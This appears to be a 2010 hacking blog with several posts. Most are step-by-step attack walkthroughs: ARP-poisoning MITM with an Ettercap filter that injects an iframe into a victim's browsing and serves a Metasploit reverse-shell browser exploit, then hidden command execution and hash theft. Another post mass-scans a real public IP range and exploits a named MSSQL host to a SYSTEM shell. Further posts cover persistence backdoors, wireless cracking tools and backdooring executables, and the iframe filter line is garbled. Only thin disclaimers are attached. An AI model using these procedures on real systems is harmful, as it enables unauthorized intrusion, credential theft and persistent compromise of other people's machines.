Monday, October 25, 2010

Ettercap MITM browser injection with backtrack

The purpose of this post to provide an example of how to use the freely available Linux distribution Backtrack when conducting security testing; and to provide a specific example of an attack scenario with detailed instructions on the commands used and their meaning.

This is by no means an all encompassing tutorial for using Backtrack during security\penetration testing. If you do not have a basic understanding of what Backtrack is or how it isued I suggest you read some info about it here: http://www.backtrack-linux.org/about/ . This post is mainly to provide the readers with an overview of a common attack vector, using what I consider to be the “swiss army knife” of IT security tools.

The instructions contained below are provided for informational\educational purposes only and should only be used on networks that you control, or have permission to utilize.

Most of the techniques described here have been documented separately or similarly on other websites\blog posts. I will post a list of references at the end for further review, and to give credit where credit is due.

Let’s look at an overview of the attack scenario:

Conditions: Access to the network has already been gained by either wireless cracking, or some other access to a wired network. The target’s IP and operating has already been discovered, as well as the gateway IP address. Our computer, the target as well as the gateway are all on the same subnet. The target is a patched Windows XP machine running SP3 and IE8. We will use Backtrack 4 final release, and the Metasploit framework version 3.

The attack will begin with a basic MITM (man-in-the-middle) ARP poisoning attack against a single target on a network.

The network traffic, specifically the Web pages browsed by the target will be intercepted by our computer, and an iframe will be injected into all of the web pages viewed. This iframe will point back to our computer which will be hosting a web page with a malicious payload (via the Metasploit framework).

When the user browses to most web pages our iframe will execute the malicious content hosted on our computer in their browser. The end result will be admin\root access to the targets computer, via a meterpreter session.

Section 1: Prepare Backtrack

If you are already familiar with Backtrack you can skip this section. This is simply the steps required for preparing Backtrack after initial live boot.

Open a terminal session and type /usr/bin/start-network This command enables the networking on Backtrack

Now we need to update Metasploit. In a terminal type cd /pentest/exploit/framework3

This brings us to the Metasploit directory. Type in svn update. At the prompt type y.

This will update the Metasploit framework with the latest modules.

Now we need to enable IP forwarding using iptables

Enter echo 1 > /proc/sys/net/ipv4/ip_forward into a terminal window

Lastly we’ll ensure ip forwarding is enabled in ettercap

We need to edit the etter.conf file. However you choose to do that is up to you, I use VI. A VI tutorial is beyond the scope of this post. I suggest you check out the security researchers’ best friend: Google if you need help with VI. Type Kate from a terminal for a GUI text editor or choose it from the Utilities menu.

The file can usually be found here: /etc/etter.conf if you’re using Backtrack4 Final Release.

We need to make 3 changes in etter.conf:

ec-uid = 0

ec_guid = 0

uncomment the redir_command_on and redir_command_off sections below the “if you use iptables” section of etter.conf

Section 2: Prepare Ettercap filter

Ettercap is a network sniffer that can not only log packet data but can use filters to inject or replace data within the packets. When used in a MITM attack ettercap filters can drop packets, or inject code into packets that will be forwarded to the target machine.

Enter this data into a text file using your favorite text editor and save it as iframe.txt:

if (ip.proto == TCP && tcp.dst == 80) {

if (search(DATA.data, “Accept-Encoding”)) {

replace(“Accept-Encoding”, “Accept-Rubbish!”);

# note: replacement string is same length as original string

msg(“zapped Accept-Encoding!\n”);

}

}

if (ip.proto == TCP && tcp.src == 80) {

replace(“”, “”);

msg(“iframe Filter Ran.\n”);

}

The above filter will put our iframe right before the closing body tag in most web sites.

Now from aterminal and in the same directory where you saved iframe.txt enter ettefilter iframe.txt –o iframe.ef.

This command compiles the iframe.txt file into the actual etterrcap filter, or “ef” file.

A success message would look like this: Script encoded into 15 instructions.

Section 3: Launch Metasploit

From the /pentest/exploit/framework3directory launch the Metasploit console with this command msfconsole

You can choose your favorite browser exploit, I’m going to use: windows/browser/ms10_xxx_helpctr_xss_cmd_exec

Metasploit commands:

Use windows/browser/ms10_xxx_helpctr_xss_cmd_exec

Set PAYLOAD windows/meterpreter/reverse_tcp

Set LHOST youripaddress

Set SRVHOST youripaddress

Set SRVPORT 80

Exploit

Section 4: Launch Ettercap for MITM attack

Now that all of the different prereqs for the attack have been prepared we can launch ettercap

Enter the following command into a terminal window (replace underlined items with the correct name in your environment): ettercap –i wlan –F iframe.ef –TQM arp:remote /targetip/ /gatewayip/ -P autoadd

The –i witch specifies interface, you only need it if you have multiple interfaces. If you have only one you can omit. –F is specifying the filter to use. T= text mode, Q=quiet M=MITM attack.

You may see only one of the addresses is added to an ettercap group. This is not uncommon with wireless clients. Both the gateway and target need to show up in one of the groups. You can either wait until your target sends an arp request or you can force it to by pinging a non existent IP on your subnet from the target. The choice is yours.

Once ettercap is running open up IE on your target and browse somewhere, I used test.com. You should see the “iframe filter run” message on your Backtrack box.

You should also see the exploit initiate on the Metasploit terminal. On your victim box a message will pop up. If oyu click allow the exploit will run.

You should then see a meterpreter session initiated on your Backtrack computer.

You can hit CTRL+C then type sessions –i 1 (that’s a number 1) to interact with the meterpreter session.

You’ve compromised the box! You can now do things like drop to a command shell on the target by entering shell into meterpreter. Or, if you want to be surreptitious you could enter execute –F cmd.exe –i –H –c. there are many things you can do with a successful meterpreter session setup. You can upload\download files, grab password hashes, send over a secure back door program like netcat, edit the registry… really whatever you want to do.

I hope you’ve found this post helpful, and will use it as a catalyst for more research to the kinds of things you can do with Backtrack and metasploit.

References

http://www.irongeek.com/i.php?page=security/ettercapfilter

http://www.backtrack-linux.org/

http://hi.baidu.com/artcracker/blog/item/86209ed411e1cac850da4b15.html

http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,5078.msg25656/topicseen,1/

http://www.irongeek.com/i.php?page=videos/deploying-metasploits-meterpreter-with-mitm-and-an-ettercap-filter

http://forum.intern0t.net/offensive-guides-information/603-arp-poisoning-mitm-attack.html

Backtrack R1

The guys at Offensive Security have yet surprised us with another security leap right before
the year ends. Backtrack R1 With over 6 months of production and joint work with blackhat, have put together once again some
of the best security tool and updates there be. Below is the update log:

* A New kernel (2.6.34)
* Massively improved hardware support
* Support for new wireless drivers
* Official FluxBox Support
* A battery of new tools added
* Some additional surprises

For those of you who are hearing backtrack for the first time. BackTrack is a Linux-based penetration
testing arsenal that aids security professionals in the ability to perform assessments in a purely
native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating
system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down
to every package, kernel configuration, script and patch solely for the purpose of the penetration tester

Wednesday, July 21, 2010

Metasploit MSSQL Exploit

The following exploit is for Microsoft SQL Server.

Requirements
Metasploit framework
NMap

Microsoft SQL Server listens on port 1433 and port 1434. Port 1433 is a TCP (Transmission Control Protocol) port. While 1434 is a UDP (User Defined Protocol) port. For NMap we will be using a SYN Scan a SYN scan is pretty much like playing ding dong ditch. A regular protocol requires a three way hand shake. A SYN scan initiates the hand shake waits for a reply then leaves. Metasploit we will be using the exploit MSSQL 2000/MSDE Resolution Overflow. “This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).”

First step is to find a vulnerable host to do this we will be looking for a host that has port 1434 open. When I scan hosts with NMap I always give it a range for I have a better chance of getting a hit. I also have the command output the results to a file for I have them on record and they are easier to search.


#nmap –sU –p1434 –P0 –sS 24.151.0.0/16 >>/home/user/1434.txt

-sU UDP scan
-p What port to scan in this case 1434
-P0 Don’t ping host first
-sS SYN scan this is for TCP but I’m in the habit of always using it
IP The IP address 24.151.0.0
/ Subnet suffix in this case 16=255.255.0.0

>> Where the output file is going to be located

The scan is going to take a while we are scanning 65,025 hosts. When the scan is done or 30min feel free to start searching the output file for anything that says open.

Interesting ports on 24-151-73-076.dhcp.nwtn.ct.charter.com (24.151.73.76):
PORT STATE SERVICE
1434/udp open ms-sql-s


So now that we found a potential box for attack we try to hack it. I will be using Metasploit 2 console for this attack, Metasploit 3, gui and web interface will all work as well.

#msfconsole
[*] Starting the Metasploit Framework...



+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf >use mssql2000_resolution
msf mssql2000_resolution >set PAYLOAD win32_reverse_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf mssql2000_resolution(win32_bind_meterpreter) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 1434 The target port

Payload: Name Default Description
-------- -------- ------------------------------------------- ----------------------
--------------------
required EXITFUNC process Exit technique: "proce
ss", "thread", "seh"
required METDLL /home/framework/data/meterpreter/metsrv.dll The full path the mete
rpreter server dll
required LPORT 4444 Listening port for bin
d shell

Target: MSQL 2000 / MSDE

msf mssql2000_resolution(win32_bind_meterpreter) >


msf mssql2000_resolution(win32_bind_meterpreter) > set RHOST 24.151.73.76
RHOST -> 24.151.73.76




msf mssql2000_resolution(win32_bind_meterpreter) > set LHOST 10.10.10.197
LHOST -> 10.10.10.197
msf mssql2000_resolution(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Trying target MSQL 2000 / MSDE with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Got connection from 10.10.10.197:2199 <-> 24.89.130.146:4444
[*] Sending Intermediate Stager (89 bytes)
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed

meterpreter> use –m Process
loadlib: Loading library from ‘ext227496.dll’ on the remote machine
meterpreter>
loadlib: success.
meterpreter> execute –f cmd –c
execute: Executing ‘cmd’…
meterpreter>
execute: success, process id is 1576
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1…
meterpreter>
interact: Starter interactive channel 1.

Microsfor Windows 2000 {Version 5.00.2195
© Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>


When you get to the shell you can do a whoami and you will see that you are logged in as NT AUTHORITY\SYSTEM, that means you have Administrator rights. Now your imagination is the limit.

Wednesday, May 26, 2010

How to Break in and Stay in

NOTE:This is only meant for educational purposes
In this tutorial i explain how easy it can be for one to hack into your computer or network and maintain his access at any later time. The art of hacking comes only when you can break in and stay in. Most attacks are realized as soon as they take effects, and the victim is likely to block or patch the attack. In such a case yo will need to have a way through which you can still get in without having to run a pile of exploits on the victims box. We look at how useful Meterpreter services (metsvc) can be and how you can crack password hashes in a few seconds. I demonstrate the use of filter files with ettercap to make a spoofed attack.




Monday, May 3, 2010

Installing spoonwep2 and spoonwpa on BackTrack 4

Incase you need more visual help on installing spoonwep and spoonwpa, you can watch the video.

First you'll need to download Spoonwep2 and Spoonwpa in the /tmp/ dir:

cd /root/Desktop
mkdir /tmp/{spoonwep2,spoonwpa}
wget hxxp://shamanvirtuel.googlepages.com/SWPA.lzm
wget hxxp://neovortex.kodings.googlepages.com/spoonwep2.lzm
lzm2dir SWPA.lzm /tmp/spoonwpa
lzm2dir spoonwep2.lzm /tmp/spoonwep2

code:
cp -rpv /mnt/sdc1/spoonwpa/usr /
cp -rpv /mnt/sdc1/spoowep2/usr /

This will create two files so that spoonwep and spoonwpa can be able to detect the interfaces

Spoonwep

echo "
#!/bin/bash
chmod 777 /usr/local/bin/wifispoonfeeder/
rm /bin/sh
ln -s /bin/bash /bin/sh
spoonwep
sleep 1
while ! [ -e /usr/local/bin/wifispoonfeeder/spoonwep/tmp/wscapture-01.csv ]
do
sleep 1;
done
ln -s /usr/local/bin/wifispoonfeeder/spoonwep/tmp/wscapture-01.csv /usr/local/bin/wifispoonfeeder/spoonwep/tmp/wscapture-01.txt 2>/dev/null
rm /bin/sh
ln -s /bin/dash /bin/sh " >/usr/bin/spoonwep.sh



Spoonwpa

echo "
#!/bin/bash
chmod 777 /usr/local/bin/wifispoonfeeder/
rm /bin/sh
ln -s /bin/bash /bin/sh
spoonwpa
sleep 1
while ! [ -e /usr/local/bin/wifispoonfeeder/spoonwpa/tmp/wscapture-01.csv ]
do
sleep 1;
done
ln -s /usr/local/bin/wifispoonfeeder/spoonwpa/tmp/wscapture-01.csv /usr/local/bin/wifispoonfeeder/spoonwpa/tmp/wscapture-01.txt 2>/dev/null
rm /bin/sh
ln -s /bin/dash /bin/sh " >/usr/bin/spoonwpa.sh


Now make it executable:
chmod 755 /usr/bin/{spoonwep.sh,spoonwpa.sh}



You want to make sure that they appear in the BackTrack menu. So let us change the desktop file and edit the command:
mv /usr/local/share/applications/spoonw* /usr/share/applications/



Open up spoonwep.desktop in any text editor of your choice and change the line Exec giving:

[Desktop Entry]
Comment=
Exec=spoonwep.sh
GenericName=
Icon=cache
Name=SpoonWep2
Path=
StartupNotify=true
Terminal=0
TerminalOptions=
Type=Application
X-KDE-SubstituteUID=false
X-KDE-Username=
Categories=BT-Radio-Network-Analysis-80211-Cracking


For Spoonwpa:

[Desktop Entry]
Comment=
Exec=spoonwpa.sh
GenericName=
Icon=cache
Name=SpoonWpa
Path=
StartupNotify=true
Terminal=0
TerminalOptions=
Type=Application
X-KDE-SubstituteUID=false
X-KDE-Username=
Categories=BT-Radio-Network-Analysis-80211-Cracking


Lets update our menus. From the command line type:
update-menus


Your Spoonwep2 and Spoonwpa is all set and ready to use.

Saturday, April 24, 2010

Metasploit backdooring

With metasploit, it's possible to get any windows binary file and use it as a backdoor on a victims computer. You can gain metapreter shell at any point. All that needed is to embed the metasploit payload into any executable that you want.

Monday, April 19, 2010

Bluetooth discovery with Ruby

#!/usr/bin/ruby
#file: whereib.rb

deviceid = '00:0E:6D:29:38:EB'
devicename = 'Nokia 6600'

count = 0
while count <>
if `hcitool name #{deviceid}`.chomp == devicename
puts devicename + ' IN RANGE'
puts Time.now
else
puts devicename + ' OUT OF RANGE'
puts Time.now
end
sleep 7
end